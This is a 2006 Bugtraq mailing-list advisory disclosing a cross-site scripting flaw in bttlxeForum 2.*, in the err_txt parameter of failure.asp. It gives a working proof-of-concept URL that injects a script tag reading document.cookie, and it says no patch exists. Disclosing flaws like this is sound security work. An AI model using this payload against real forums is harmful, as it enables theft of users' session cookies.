
Date: 26 Feb 2006 18:05:15 -0000
From: stormhacker@...mail.com
To: bugtraq@...urityfocus.com
Subject: bttlxeForum 2.* XSS Vulnerability


--------------------Summary----------------
Software: bttlxeForum
Sowtware's Web Site: http://www.bttlxe.com/
Versions: 2.*
Type: Cross-Site Scripting
Class: Remote
Exploit: Available
Solution: Not Available
Discovered by: runvirus 
(worlddefacers.de securitycentra.com)
-----------------Description---------------
Vulnerable Script: failure.asp
--------------Exploit----------------------
http://www.example.comforums/failure.asp?err_txt=<script>alert(document.cookie);</script>
--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Discovered by: runvirus
(worlddefacers.de securitycentra.com)



